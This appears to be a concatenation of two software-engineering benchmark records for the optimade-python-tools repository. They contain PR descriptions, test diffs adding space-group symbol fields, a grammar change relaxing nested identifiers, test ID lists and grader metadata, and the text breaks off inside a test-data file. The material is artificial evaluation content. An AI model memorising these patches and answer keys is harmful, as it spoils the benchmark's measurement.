({translation}) ([-+] [xyz] ([-+][xyz])? )?" + symop = f"({translation_appended}|{translation_prepended})".replace(" ", "") + return f"^{symop},{symop},{symop}$" + + +SPACE_GROUP_SYMMETRY_OPERATION_REGEX = _generate_symmetry_operation_regex() EXTRA_SYMBOLS = ["X", "vacancy"]
Add remaining symmetry group fields (Hall, HM symbols, IT number) Finishes the remaining work migrating #1422.
**Title** Add optional symmetry‑group metadata (Hall, Hermann‑Mauguin, extended H‑M, and IT number) to the Structures model and OpenAPI definition **Problem** The Structures endpoint did not expose standard crystallographic symmetry descriptors, preventing clients from accessing Hall symbols, Hermann‑Mauguin symbols (short and extended) and the International Tables group number. **Root Cause** The OpenAPI schema and the Pydantic model lacked definitions for these fields, and the utility module did not provide a regular‑expression validator for Hermann‑Mauguin symbols. **Fix / Expected Behavior** - Introduce four new optional fields representing Hall symbol, short H‑M symbol, extended H‑M symbol, and IT group number. - Mark each field as optional and queryable at the OPTIONAL support level. - Enforce pattern validation for H‑M symbols via a shared regular expression. - Constrain the IT number to the range 1–230 and make it nullable when the structure is not three‑dimensional. - Update the OpenAPI specification to include the new properties with full descriptions, examples, and bibliographic references. **Risk & Validation** - Because the new fields are optional, existing clients remain functional, but downstream tools must handle the additional keys gracefully. - Run the full test suite, including schema validation tests, to verify that serialization and deserialization accept both valid values and `null`. - Manually inspect the generated OpenAPI JSON to confirm that the new properties appear with correct metadata and constraints.
2,240
Materials-Consortia/optimade-python-tools
diff --git a/tests/adapters/structures/test_structures.py b/tests/adapters/structures/test_structures.py index 2e9fd5c5..7e1882bb 100644 --- a/tests/adapters/structures/test_structures.py +++ b/tests/adapters/structures/test_structures.py @@ -192,6 +192,10 @@ def compare_lossy_conversion( "species", "fractional_site_positions", "space_group_symmetry_operations_xyz", + "space_group_symbol_hall", + "space_group_symbol_hermann_mauguin", + "space_group_symbol_hermann_mauguin_extended", + "space_group_it_number", ) array_keys = ("cartesian_site_positions", "lattice_vectors") diff --git a/tests/models/test_data/test_good_structures.json b/tests/models/test_data/test_good_structures.json index c06a32dc..562ef906 100644 --- a/tests/models/test_data/test_good_structures.json +++ b/tests/models/test_data/test_good_structures.json @@ -191,7 +191,10 @@ {"name": "P", "chemical_symbols": ["P"], "concentration": [1.0] } ], "structure_features": ["site_attachments"], - "space_group_symmetry_operations_xyz": ["x,y,z", "-x,y,-z", "x+1/2,y+1/2,z", "-x+1/2,y+1/2,-z"] + "space_group_symmetry_operations_xyz": ["x,y,z", "-x,y,-z", "x+1/2,y+1/2,z", "-x+1/2,y+1/2,-z"], + "space_group_symbol_hermann_mauguin": "R -3 m", + "space_group_symbol_hermann_mauguin_extended": "R -3 m", + "space_group_symbol_hall": "I 4bd 2ab 3" }, { "task_id": "db/1234567", @@ -224,6 +227,10 @@ {"name": "P", "chemical_symbols": ["P"], "concentration": [1.0] } ], "structure_features": ["disorder", "site_attachments"], - "space_group_symmetry_operations_xyz": ["x,y,z"] + "space_group_symmetry_operations_xyz": ["x,y,z"], + "space_group_symbol_hall": "P 2yb (-1/2*x+z,1/2*x,y)", + "space_group_symbol_hermann_mauguin": "P 1", + "space_group_symbol_hermann_mauguin_extended": "P 1", + "space_group_it_number": 122 } ] diff --git a/tests/models/test_structures.py b/tests/models/test_structures.py index bafee17d..2591b06a 100644 --- a/tests/models/test_structures.py +++ b/tests/models/test_structures.py @@ -211,6 +211,10 @@ deformities = ( {"space_group_symmetry_operations_xyz": ["xy,z"]}, "String should match pattern", ), + ( + {"space_group_symbol_hermann_mauguin": "P1"}, + "String should match pattern", + ), ) diff --git a/tests/models/test_utils.py b/tests/models/test_utils.py index ff13cf90..267f3780 100644 --- a/tests/models/test_utils.py +++ b/tests/models/test_utils.py @@ -1,9 +1,15 @@ +import re from collections.abc import Callable import pytest from pydantic import BaseModel, Field, ValidationError -from optimade.models.utils import OptimadeField, StrictField, SupportLevel +from optimade.models.utils import ( + HM_SYMBOL_REGEXP, + OptimadeField, + StrictField, + SupportLevel, +) def make_bad_models(field: Callable): @@ -159,3 +165,58 @@ def test_anonymize_formula(): assert anonymize_formula("Si1 O2") == "A2B" assert anonymize_formula("Si11 O2") == "A11B2" assert anonymize_formula("Si10 O2C4") == "A5B2C" + + +VALID_HM_SYMBOLS = [ + "P 1", # Triclinic + "P -1", + "P 2", # Monoclinic + "P 21", + "P m", + "P c", + "P 2/m", + "P 21/c", + "P 21/n", + "C 2/c", + "P 2 2 2", # Orthorhombic + "P 21 21 21", + "P n n n", + "P m m a", + "F d d d", + "I m m a", + "P 4", # Tetragonal + "P 41", + "P 42", + "P 43", + "I 4/m m m", + "P 3", # Trigonal + "R 3", + "P 31", + "R -3 m", + "P 6", # Hexagonal + "P 63/m m c", + "P m -3", # Cubic + "F m -3 m", + "I a -3 d", +] + +INVALID_HM_SYMBOLS = [ + "", # Empty string + "p 1", # Lowercase lattice + "Q 1", # Invalid lattice + "P1", # No space + "1 P", # Wrong order + "P 2/c/m", # Invalid combination + "PP 2", # Double letter + "X -3 m", # Invalid lattice +] + + +@pytest.mark.parametrize("hm_symbol", VALID_HM_SYMBOLS) +def test_hm_symbol_regexp(hm_symbol): + assert re.match(HM_SYMBOL_REGEXP, hm_symbol) + + +@pytest.mark.parametrize("hm_symbol", INVALID_HM_SYMBOLS) +def test_invalid_space_groups(hm_symbol): + assert re.match(HM_SYMBOL_REGEXP, hm_symbol) is None diff --git a/tests/server/test_client.py b/tests/server/test_client.py index 3e02ca41..796cb1a7 100644 --- a/tests/server/test_client.py +++ b/tests/server/test_client.py @@ -509,7 +509,7 @@ def test_list_properties( results = cli.list_properties("structures") for database in results: - assert len(results[database]) == 23, str(results[database]) + assert len(results[database]) == 27, str(results[database]) results = cli.search_property("structures", "site") for database in results:
[ "tests/adapters/structures/test_structures.py::test_instantiate", "tests/adapters/structures/test_structures.py::test_setting_entry", "tests/adapters/structures/test_structures.py::test_convert_wrong_format", "tests/adapters/structures/test_structures.py::test_getattr_order", "tests/adapters/structures/test_structures.py::test_no_module_conversion", "tests/adapters/structures/test_structures.py::test_common_converters", "tests/adapters/structures/test_structures.py::test_two_way_conversion[pymatgen]", "tests/adapters/structures/test_structures.py::test_two_way_conversion[ase]", "tests/adapters/structures/test_structures.py::test_two_way_conversion_with_implicit_type[pymatgen]", "tests/adapters/structures/test_structures.py::test_two_way_conversion_with_implicit_type[ase]", "tests/adapters/structures/test_structures.py::test_load_good_structure_from_url", "tests/adapters/structures/test_structures.py::test_load_bad_structure_from_url", "tests/models/test_structures.py::test_good_structure_with_missing_data", "tests/models/test_structures.py::test_more_good_structures", "tests/models/test_structures.py::test_bad_structures", "tests/models/test_structures.py::test_structure_fatal_deformities[None]", "tests/models/test_structures.py::test_structure_fatal_deformities[deformity1]", "tests/models/test_structures.py::test_structure_fatal_deformities[deformity2]", "tests/models/test_structures.py::test_structure_fatal_deformities[deformity3]", "tests/models/test_structures.py::test_structure_fatal_deformities[deformity4]", "tests/models/test_structures.py::test_structure_fatal_deformities[deformity5]", "tests/models/test_structures.py::test_structure_fatal_deformities[deformity6]", "tests/models/test_structures.py::test_structure_fatal_deformities[deformity7]", "tests/models/test_structures.py::test_structure_fatal_deformities[deformity8]", "tests/models/test_structures.py::test_structure_fatal_deformities[deformity9]", "tests/models/test_structures.py::test_structure_fatal_deformities[deformity10]", "tests/models/test_structures.py::test_structure_fatal_deformities[deformity11]", "tests/models/test_structures.py::test_structure_fatal_deformities[deformity12]", "tests/models/test_structures.py::test_structure_fatal_deformities[deformity13]", "tests/models/test_structures.py::test_structure_fatal_deformities[deformity14]", "tests/models/test_structures.py::test_structure_fatal_deformities[deformity15]", "tests/models/test_structures.py::test_structure_fatal_deformities[deformity16]", "tests/models/test_structures.py::test_structure_fatal_deformities[deformity17]", "tests/models/test_structures.py::test_structure_fatal_deformities[deformity18]", "tests/models/test_structures.py::test_structure_fatal_deformities[deformity19]", "tests/models/test_structures.py::test_structure_fatal_deformities[deformity20]", "tests/models/test_structures.py::test_structure_fatal_deformities[deformity21]", "tests/models/test_structures.py::test_structure_fatal_deformities[deformity22]", "tests/models/test_structures.py::test_structure_fatal_deformities[deformity23]", "tests/models/test_structures.py::test_structure_fatal_deformities[deformity24]", "tests/models/test_structures.py::test_structure_fatal_deformities[deformity25]", "tests/models/test_structures.py::test_structure_fatal_deformities[deformity26]", "tests/models/test_structures.py::test_structure_fatal_deformities[deformity27]", "tests/models/test_structures.py::test_structure_fatal_deformities[deformity28]", "tests/models/test_structures.py::test_structure_fatal_deformities[deformity29]", "tests/models/test_structures.py::test_structure_fatal_deformities[deformity30]", "tests/models/test_structures.py::test_structure_minor_deformities[deformity0]", "tests/models/test_structures.py::test_structure_minor_deformities[deformity1]", "tests/models/test_structures.py::test_structure_minor_deformities[deformity2]", "tests/models/test_structures.py::test_structure_minor_deformities[deformity3]", "tests/models/test_structures.py::test_structure_minor_deformities[deformity4]", "tests/models/test_structures.py::test_structure_minor_deformities[deformity5]", "tests/models/test_utils.py::test_strict_field", "tests/models/test_utils.py::test_optimade_field", "tests/models/test_utils.py::test_compatible_strict_optimade_field", "tests/models/test_utils.py::test_formula_regexp", "tests/models/test_utils.py::test_reduce_formula", "tests/models/test_utils.py::test_anonymize_formula", "tests/models/test_utils.py::test_hm_symbol_regexp[P", "tests/models/test_utils.py::test_hm_symbol_regexp[C", "tests/models/test_utils.py::test_hm_symbol_regexp[F", "tests/models/test_utils.py::test_hm_symbol_regexp[I", "tests/models/test_utils.py::test_hm_symbol_regexp[R", "tests/models/test_utils.py::test_invalid_space_groups[]", "tests/models/test_utils.py::test_invalid_space_groups[p", "tests/models/test_utils.py::test_invalid_space_groups[Q", "tests/models/test_utils.py::test_invalid_space_groups[P1]", "tests/models/test_utils.py::test_invalid_space_groups[1", "tests/models/test_utils.py::test_invalid_space_groups[P", "tests/models/test_utils.py::test_invalid_space_groups[PP", "tests/models/test_utils.py::test_invalid_space_groups[X", "tests/server/test_client.py::test_client_endpoints[False]", "tests/server/test_client.py::test_client_endpoints[True]", "tests/server/test_client.py::test_filter_validation[True]", "tests/server/test_client.py::test_filter_validation[False]", "tests/server/test_client.py::test_client_response_fields[True]", "tests/server/test_client.py::test_client_response_fields[False]", "tests/server/test_client.py::test_multiple_base_urls[True]", "tests/server/test_client.py::test_multiple_base_urls[False]", "tests/server/test_client.py::test_include_exclude_providers[True]", "tests/server/test_client.py::test_include_exclude_providers[False]", "tests/server/test_client.py::test_client_sort[True]", "tests/server/test_client.py::test_client_sort[False]", "tests/server/test_client.py::test_command_line_client[True]", "tests/server/test_client.py::test_command_line_client[False]", "tests/server/test_client.py::test_command_line_client_silent[True]", "tests/server/test_client.py::test_command_line_client_silent[False]", "tests/server/test_client.py::test_command_line_client_multi_provider[True]", "tests/server/test_client.py::test_command_line_client_multi_provider[False]", "tests/server/test_client.py::test_command_line_client_write_to_file[True]", "tests/server/test_client.py::test_command_line_client_write_to_file[False]", "tests/server/test_client.py::test_strict_async[True]", "tests/server/test_client.py::test_strict_async[False]", "tests/server/test_client.py::test_client_global_data_callback[True]", "tests/server/test_client.py::test_client_global_data_callback[False]", "tests/server/test_client.py::test_client_page_skip_callback[True]", "tests/server/test_client.py::test_client_page_skip_callback[False]", "tests/server/test_client.py::test_client_mutable_data_callback[True]", "tests/server/test_client.py::test_client_mutable_data_callback[False]", "tests/server/test_client.py::test_client_asynchronous_write_callback[True]", "tests/server/test_client.py::test_client_asynchronous_write_callback[False]", "tests/server/test_client.py::test_list_properties[True]", "tests/server/test_client.py::test_list_properties[False]", "tests/server/test_client.py::test_binary_search_internals[1_0]", "tests/server/test_client.py::test_binary_search_internals[2_0]", "tests/server/test_client.py::test_binary_search_internals[1_1]", "tests/server/test_client.py::test_binary_search_internals[1_2]", "tests/server/test_client.py::test_binary_search_internals[1_3]", "tests/server/test_client.py::test_binary_search_internals[2_1]", "tests/server/test_client.py::test_binary_search_internals[2_2]", "tests/server/test_client.py::test_binary_search_internals[3]", "tests/server/test_client.py::test_binary_search_internals[4]", "tests/server/test_client.py::test_binary_search_internals[5]", "tests/server/test_client.py::test_binary_search_internals[6]", "tests/server/test_client.py::test_binary_search_internals[7]", "tests/server/test_client.py::test_binary_search_internals[9]", "tests/server/test_client.py::test_binary_search_internals[12]", "tests/server/test_client.py::test_binary_search_internals[14]", "tests/server/test_client.py::test_binary_search_internals[18]", "tests/server/test_client.py::test_binary_search_internals[22]", "tests/server/test_client.py::test_binary_search_internals[27]", "tests/server/test_client.py::test_binary_search_internals[33]", "tests/server/test_client.py::test_binary_search_internals[41]", "tests/server/test_client.py::test_binary_search_internals[51]", "tests/server/test_client.py::test_binary_search_internals[63]", "tests/server/test_client.py::test_binary_search_internals[77]", "tests/server/test_client.py::test_binary_search_internals[95]", "tests/server/test_client.py::test_binary_search_internals[117]", "tests/server/test_client.py::test_binary_search_internals[144]", "tests/server/test_client.py::test_binary_search_internals[177]", "tests/server/test_client.py::test_binary_search_internals[218]", "tests/server/test_client.py::test_binary_search_internals[269]", "tests/server/test_client.py::test_binary_search_internals[331]", "tests/server/test_client.py::test_binary_search_internals[407]", "tests/server/test_client.py::test_binary_search_internals[501]", "tests/server/test_client.py::test_binary_search_internals[616]", "tests/server/test_client.py::test_binary_search_internals[758]", "tests/server/test_client.py::test_binary_search_internals[933]", "tests/server/test_client.py::test_binary_search_internals[1148]", "tests/server/test_client.py::test_binary_search_internals[1412]", "tests/server/test_client.py::test_binary_search_internals[1737]", "tests/server/test_client.py::test_binary_search_internals[2137]", "tests/server/test_client.py::test_binary_search_internals[2630]", "tests/server/test_client.py::test_binary_search_internals[3235]", "tests/server/test_client.py::test_binary_search_internals[3981]", "tests/server/test_client.py::test_binary_search_internals[4897]", "tests/server/test_client.py::test_binary_search_internals[6025]", "tests/server/test_client.py::test_binary_search_internals[7413]", "tests/server/test_client.py::test_binary_search_internals[9120]", "tests/server/test_client.py::test_binary_search_internals[11220]", "tests/server/test_client.py::test_binary_search_internals[13803]", "tests/server/test_client.py::test_binary_search_internals[16982]", "tests/server/test_client.py::test_binary_search_internals[20892]", "tests/server/test_client.py::test_binary_search_internals[25703]", "tests/server/test_client.py::test_binary_search_internals[31622]", "tests/server/test_client.py::test_binary_search_internals[38904]", "tests/server/test_client.py::test_binary_search_internals[47863]", "tests/server/test_client.py::test_binary_search_internals[58884]", "tests/server/test_client.py::test_binary_search_internals[72443]", "tests/server/test_client.py::test_binary_search_internals[89125]", "tests/server/test_client.py::test_binary_search_internals[109647]", "tests/server/test_client.py::test_binary_search_internals[134896]", "tests/server/test_client.py::test_binary_search_internals[165958]", "tests/server/test_client.py::test_binary_search_internals[204173]", "tests/server/test_client.py::test_binary_search_internals[251188]", "tests/server/test_client.py::test_binary_search_internals[309029]", "tests/server/test_client.py::test_binary_search_internals[380189]", "tests/server/test_client.py::test_binary_search_internals[467735]", "tests/server/test_client.py::test_binary_search_internals[575439]", "tests/server/test_client.py::test_binary_search_internals[707945]", "tests/server/test_client.py::test_binary_search_internals[870963]", "tests/server/test_client.py::test_binary_search_internals[1071519]", "tests/server/test_client.py::test_binary_search_internals[1318256]", "tests/server/test_client.py::test_binary_search_internals[1621810]", "tests/server/test_client.py::test_binary_search_internals[1995262]", "tests/server/test_client.py::test_binary_search_internals[2454708]", "tests/server/test_client.py::test_binary_search_internals[3019951]", "tests/server/test_client.py::test_binary_search_internals[3715352]", "tests/server/test_client.py::test_binary_search_internals[4570881]", "tests/server/test_client.py::test_binary_search_internals[5623413]", "tests/server/test_client.py::test_binary_search_internals[6918309]", "tests/server/test_client.py::test_binary_search_internals[8511380]", "tests/server/test_client.py::test_binary_search_internals[10471285]", "tests/server/test_client.py::test_binary_search_internals[12882495]", "tests/server/test_client.py::test_binary_search_internals[15848931]", "tests/server/test_client.py::test_binary_search_internals[19498445]", "tests/server/test_client.py::test_binary_search_internals[23988329]", "tests/server/test_client.py::test_binary_search_internals[29512092]", "tests/server/test_client.py::test_binary_search_internals[36307805]", "tests/server/test_client.py::test_binary_search_internals[44668359]", "tests/server/test_client.py::test_binary_search_internals[54954087]", "tests/server/test_client.py::test_binary_search_internals[67608297]", "tests/server/test_client.py::test_binary_search_internals[83176377]", "tests/server/test_client.py::test_binary_search_internals[102329299]", "tests/server/test_client.py::test_binary_search_internals[125892541]", "tests/server/test_client.py::test_binary_search_internals[154881661]", "tests/server/test_client.py::test_binary_search_internals[190546071]", "tests/server/test_client.py::test_binary_search_internals[234422881]", "tests/server/test_client.py::test_binary_search_internals[288403150]", "tests/server/test_client.py::test_binary_search_internals[354813389]", "tests/server/test_client.py::test_binary_search_internals[436515832]", "tests/server/test_client.py::test_binary_search_internals[537031796]", "tests/server/test_client.py::test_binary_search_internals[660693448]", "tests/server/test_client.py::test_binary_search_internals[812830516]", "tests/server/test_client.py::test_binary_search_internals[1000000000]", "tests/server/test_client.py::test_raw_get_one_sync", "tests/server/test_client.py::test_raw_get_one_async" ]
[]
No new interfaces are introduced.
MIT
{ "base_image_name": "python_base_310", "install": [ "git submodule update --init --recursive", "pip install -q -r requirements.txt -r requirements-dev.txt -r requirements-server.txt -r requirements-http-client.txt", "pip install -q -e ." ], "log_parser": "parse_log_pytest", "test_cmd": "pytest --no-header -rA --tb=line --color=no -p no:cacheprovider -W ignore::DeprecationWarning tests/adapters/structures/test_structures.py tests/models/test_structures.py tests/models/test_utils.py tests/server/test_client.py" }
{ "num_modified_files": 3, "num_modified_lines": 188, "pr_author": "ml-evs", "pr_labels": [], "llm_metadata": { "code": "A", "code_quality": null, "confidence": 0.97, "detected_issues": { "B1": false, "B2": false, "B3": false, "B4": false, "B5": false, "B6": false }, "detected_issues_explanation": null, "detecte d_issues": null, "difficulty": "medium", "external_urls": [], "intent_completeness": "complete", "patch": null, "pr_categories": [ "core_feat" ], "reason": null, "reasoning": "The issue requests adding Hall, Hermann‑Mauguin, extended Hermann‑Mauguin symbols and the IT number to the structure model. The test changes check that these fields appear in model conversion, in example JSON data, and that the Hermann‑Mauguin regex validates correct/incorrect symbols. The tests directly reflect the stated requirement, with no hidden expectations or external dependencies, so the problem is well‑specified and solvable. No B‑category signals are present.", "suggested_fixes": null, "test_alignment": null, "test_alignment_issues": [], "test_alignment_quick_tree": null, "test_alignment_quick_tree_bootstrap": null, "test_alignment_quick_tree_mocks": null, "test_alignment_quick_tree_params": null, "test_alignment_quick_tree_unrelated": null, "test_alignment_quick_tree_use_hook": null, "test_alignment_quick_tree_use_hook_unrelated": null, "test_alignment_sample_without_replacement": null, "test_alignment_test_alignment_sample_without_replacement": null, "test_build_phylogeny": null, "test_build_phylogeny_unrelated": null, "test_build_phylogeny_use_hook": null, "test_build_phylogeny_use_hook_unrelated": null, "test_core_seq_test_sample_motif_length_1": null, "test_core_seq_test_sample_motif_length_3": null, "test_core_seq_test_sample_without_replacement": null, "test_core_sequence": null, "test_core_sequence_test_sample_motif_length_1": null, "test_core_sequence_test_sample_motif_length_3": null, "test_core_sequence_test_sample_without_replacement": null, "test_sample_motif_length_1": null, "test_sample_motif_length_3": null, "test_sample_without_replacement": null } }
0be0c7f0e627652eb6b98ce7cdf83f2f3881843e
2025-03-08 16:57:19
ml-evs: pre-commit.ci autofix ml-evs: pre-commit.ci autofix codecov[bot]: ## [Codecov](https://app.codecov.io/gh/Materials-Consortia/optimade-python-tools/pull/2242?dropdown=coverage&src=pr&el=h1&utm_medium=referral&utm_source=github&utm_content=comment&utm_campaign=pr+comments&utm_term=Materials-Consortia) Report All modified and coverable lines are covered by tests :white_check_mark: > Project coverage is 90.60%. Comparing base [(`0be0c7f`)](https://app.codecov.io/gh/Materials-Consortia/optimade-python-tools/commit/0be0c7f0e627652eb6b98ce7cdf83f2f3881843e?dropdown=coverage&el=desc&utm_medium=referral&utm_source=github&utm_content=comment&utm_campaign=pr+comments&utm_term=Materials-Consortia) to head [(`4f11c24`)](https://app.codecov.io/gh/Materials-Consortia/optimade-python-tools/commit/4f11c24d3ef56d5019cad31b1040b8b6ca38d899?dropdown=coverage&el=desc&utm_medium=referral&utm_source=github&utm_content=comment&utm_campaign=pr+comments&utm_term=Materials-Consortia). <details><summary>Additional details and impacted files</summary> ```diff @@ Coverage Diff @@ ## main #2242 +/- ## ======================================= Coverage 90.60% 90.60% ======================================= Files 75 75 Lines 4929 4929 ======================================= Hits 4466 4466 Misses 463 463 ``` | [Flag](https://app.codecov.io/gh/Materials-Consortia/optimade-python-tools/pull/2242/flags?src=pr&el=flags&utm_medium=referral&utm_source=github&utm_content=comment&utm_campaign=pr+comments&utm_term=Materials-Consortia) | Coverage Δ | | |---|---|---| | [project](https://app.codecov.io/gh/Materials-Consortia/optimade-python-tools/pull/2242/flags?src=pr&el=flag&utm_medium=referral&utm_source=github&utm_content=comment&utm_campaign=pr+comments&utm_term=Materials-Consortia) | `90.60% <ø> (ø)` | | | [validator](https://app.codecov.io/gh/Materials-Consortia/optimade-python-tools/pull/2242/flags?src=pr&el=flag&utm_medium=referral&utm_source=github&utm_content=comment&utm_campaign=pr+comments&utm_term=Materials-Consortia) | `90.60% <ø> (ø)` | | Flags with carried forward coverage won't be shown. [Click here](https://docs.codecov.io/docs/carryforward-flags?utm_medium=referral&utm_source=github&utm_content=comment&utm_campaign=pr+comments&utm_term=Materials-Consortia#carryforward-flags-in-the-pull-request-comment) to find out more. </details> [:umbrella: View full report in Codecov by Sentry](https://app.codecov.io/gh/Materials-Consortia/optimade-python-tools/pull/2242?dropdown=coverage&src=pr&el=continue&utm_medium=referral&utm_source=github&utm_content=comment&utm_campaign=pr+comments&utm_term=Materials-Consortia). :loudspeaker: Have feedback on the report? [Share it here](https://about.codecov.io/codecov-pr-comment-feedback/?utm_medium=referral&utm_source=github&utm_content=comment&utm_campaign=pr+comments&utm_term=Materials-Consortia). <details><summary>🚀 New features to boost your workflow: </summary> - ❄ [Test Analytics](https://docs.codecov.com/docs/test-analytics): Detect flaky tests, report on failures, and find test suite problems. </details> ml-evs: pre-commit.ci autofix
materials-consortia__optimade-python-tools-2242
diff --git a/optimade/grammar/v1.2.0.develop.lark b/optimade/grammar/v1.2.0.lark similarity index 96% rename from optimade/grammar/v1.2.0.develop.lark rename to optimade/grammar/v1.2.0.lark index 12ec22c0..6d803090 100644 --- a/optimade/grammar/v1.2.0.develop.lark +++ b/optimade/grammar/v1.2.0.lark @@ -55,7 +55,7 @@ set_zip_op_rhs: property_zip_addon HAS ( value_zip | ONLY value_zip_list | ALL v property_zip_addon: ":" property (":" property)* // Property syntax -property: IDENTIFIER ( "." IDENTIFIER )* +property: IDENTIFIER ( "." NESTED_IDENTIFIER )* // String syntax string: ESCAPED_STRING @@ -95,6 +95,7 @@ ANY: "ANY" OPERATOR: ( "<" ["="] | ">" ["="] | ["!"] "=" ) IDENTIFIER: ( "_" | LCASE_LETTER ) ( "_" | LCASE_LETTER | DIGIT )* +NESTED_IDENTIFIER: ( "_" | LCASE_LETTER ) ( "_" | "+" | LCASE_LETTER | DIGIT )* LCASE_LETTER: "a".."z" DIGIT: "0".."9" diff --git a/optimade/server/routers/utils.py b/optimade/server/routers/utils.py index b2f16186..a6687d5c 100644 --- a/optimade/server/routers/utils.py +++ b/optimade/server/routers/utils.py @@ -166,6 +166,10 @@ def get_included_relationships( ) endpoint_includes: dict[Any, dict] = defaultdict(dict) + + if not include_param: + return [] + for doc in results: # convert list of references into dict by ID to only included unique IDs if doc is None:
Use 1.2 grammar by default and relax rules on nested fields This PR simply removes the "develop" tag from the v1.2.0 grammar, which should make it the default. It also allows nested field names to have more flexibility, inspired by e.g., the MP field `_mp_stability.gga_gga+u_r2scan` (#2182). The spec reads that dictionary keys must only be strings, not identifiers, so I have relaxed our previous approach of enforcing an identifier to allow for filtering on such fields. I'll do a bit of testing to make sure that this is still URL-safe, but I think we should be fine.
**Title** Default to v1.2 grammar and relax nested property token rules; guard include handling **Problem** The library defaults to an older grammar version and enforces overly strict rules on nested property names, rejecting valid dictionary keys such as those containing “+”. Additionally, the relationship‑inclusion helper processes requests even when no include parameter is supplied, leading to unnecessary work and potential errors. **Root Cause** The v1.2 grammar was marked as a development version and its property rule limited nested segments to simple identifiers. The inclusion utility lacked an early‑exit condition for missing include parameters. **Fix / Expected Behavior** - v1.2 grammar is now the default parsing grammar. - Property token definition accepts a broader set of characters for nested segments, matching the specification that dictionary keys are arbitrary strings. - The inclusion helper immediately returns an empty list when the include parameter is absent. - All existing API endpoints continue to operate correctly with the updated grammar and inclusion logic. **Risk & Validation** - Verify that relaxed nested identifiers remain URL‑safe and do not break existing query parsing. - Run the full test suite, including cases that filter on nested fields and calls without include parameters. - Confirm that downstream components that rely on include processing handle an empty list gracefully.
2,242
Materials-Consortia/optimade-python-tools
diff --git a/optimade/server/data/test_data.jsonl b/optimade/server/data/test_data.jsonl index 2872b2f2..f1f58619 100644 --- a/optimade/server/data/test_data.jsonl +++ b/optimade/server/data/test_data.jsonl @@ -14,7 +14,7 @@ {"type": "structures", "id": "mpf_3", "attributes": {"immutable_id": "5cfb441f053b174410700d04", "assemblies": null, "chemsys": "Ac-Ag-Pb", "cartesian_site_positions": [[0.6522459815095935, 0.6522459815095935, 0.6522459815095935], [0.6522459815095935, 0.6522459815095935, 0.6522459815095935], [0.6522459815095935, 0.6522459815095935, 0.6522459815095935], [0.6522459815095935, 0.6522459815095935, 0.6522459815095935]], "dimension_types": [1, 1, 1], "nperiodic_dimensions": 3, "elements": ["Ac", "Ag", "Pb"], "elements_ratios": [0.5, 0.25, 0.25], "formula_anonymous": "A2BC", "last_modified": {"$date": "2019-06-08T05:13:37.331Z"}, "lattice_vectors": [[7.698325441636717, 0, 0], [0, 3.9419030762941096, 0], [0, 0, 0.5746646140691603]], "nelements": 3, "nsites": 4, "pretty_formula": "Ac2AgPb", "species": [{"chemical_symbols": ["Ac"], "concentration": [1.0], "name": "Ac1"}, {"chemical_symbols": ["Ac"], "concentration": [1.0], "name": "Ac2"}, {"chemical_symbols": ["Ag"], "concentration": [1.0], "name": "Ag"}, {"chemical_symbols": ["Pb"], "concentration": [1.0], "name": "Pb"}], "species_at_sites": ["Ac1", "Ac2", "Ag", "Pb"], "structure_features": [], "task_id": "mpf_3", "relationships": {"references": {"data": [{"type": "references", "id": "maddox1988"}]}}, "_exmpl_this_provider_field": "test"}} {"type": "structures", "id": "mpf_30", "attributes": {"immutable_id": "5cfb441f053b174410700d1f", "assemblies": null, "chemsys": "Ac-O", "cartesian_site_positions": [[0.15817967032742697, 0.15817967032742697, 0.15817967032742697], [0.15817967032742697, 0.15817967032742697, 0.15817967032742697], [0.15817967032742697, 0.15817967032742697, 0.15817967032742697], [0.15817967032742697, 0.15817967032742697, 0.15817967032742697], [0.15817967032742697, 0.15817967032742697, 0.15817967032742697]], "dimension_types": [1, 1, 1], "nperiodic_dimensions": 3, "elements": ["Ac", "O"], "elements_ratios": [0.4, 0.6], "formula_anonymous": "A3B2", "last_modified": {"$date": "2019-06-08T05:13:37.337Z"}, "lattice_vectors": [[5.270508031864836, 0, 0], [0, 7.390955992107494, 0], [0, 0, 3.0995955580253574]], "nelements": 2, "nsites": 5, "pretty_formula": "Ac2O3", "species": [{"chemical_symbols": ["Ac"], "concentration": [1.0], "name": "Ac"}, {"chemical_symbols": ["O"], "concentration": [1.0], "name": "O"}], "species_at_sites": ["Ac", "Ac", "O", "O", "O"], "structure_features": [], "task_id": "mpf_30", "_exmpl_this_provider_field": "test"}} {"type": "structures", "id": "mpf_3803", "attributes": {"immutable_id": "5cfb441f053b174410701bdc", "assemblies": null, "chemsys": "Ba-Ce-Fe-H-Na-O-Si-Ti", "cartesian_site_positions": [[0.8417172367979051, 0.8417172367979051, 0.8417172367979051], [0.8417172367979051, 0.8417172367979051, 0.8417172367979051], [0.8417172367979051, 0.8417172367979051, 0.8417172367979051], [0.8417172367979051, 0.8417172367979051, 0.8417172367979051], [0.8417172367979051, 0.8417172367979051, 0.8417172367979051], [0.8417172367979051, 0.8417172367979051, 0.8417172367979051], [0.8417172367979051, 0.8417172367979051, 0.8417172367979051], [0.8417172367979051, 0.8417172367979051, 0.8417172367979051], [0.8417172367979051, 0.8417172367979051, 0.8417172367979051], [0.8417172367979051, 0.8417172367979051, 0.8417172367979051], [0.8417172367979051, 0.8417172367979051, 0.8417172367979051], [0.8417172367979051, 0.8417172367979051, 0.8417172367979051], [0.8417172367979051, 0.8417172367979051, 0.8417172367979051], [0.8417172367979051, 0.8417172367979051, 0.8417172367979051], [0.8417172367979051, 0.8417172367979051, 0.8417172367979051], [0.8417172367979051, 0.8417172367979051, 0.8417172367979051], [0.8417172367979051, 0.8417172367979051, 0.8417172367979051], [0.8417172367979051, 0.8417172367979051, 0.8417172367979051], [0.8417172367979051, 0.8417172367979051, 0.8417172367979051], [0.8417172367979051, 0.8417172367979051, 0.8417172367979051], [0.8417172367979051, 0.8417172367979051, 0.8417172367979051], [0.8417172367979051, 0.8417172367979051, 0.8417172367979051], [0.8417172367979051, 0.8417172367979051, 0.8417172367979051], [0.8417172367979051, 0.8417172367979051, 0.8417172367979051], [0.8417172367979051, 0.8417172367979051, 0.8417172367979051], [0.8417172367979051, 0.8417172367979051, 0.8417172367979051], [0.8417172367979051, 0.8417172367979051, 0.8417172367979051], [0.8417172367979051, 0.8417172367979051, 0.8417172367979051], [0.8417172367979051, 0.8417172367979051, 0.8417172367979051], [0.8417172367979051, 0.8417172367979051, 0.8417172367979051], [0.8417172367979051, 0.8417172367979051, 0.8417172367979051], [0.8417172367979051, 0.8417172367979051, 0.8417172367979051], [0.8417172367979051, 0.8417172367979051, 0.8417172367979051], [0.8417172367979051, 0.8417172367979051, 0.8417172367979051], [0.8417172367979051, 0.8417172367979051, 0.8417172367979051], [0.8417172367979051, 0.8417172367979051, 0.8417172367979051], 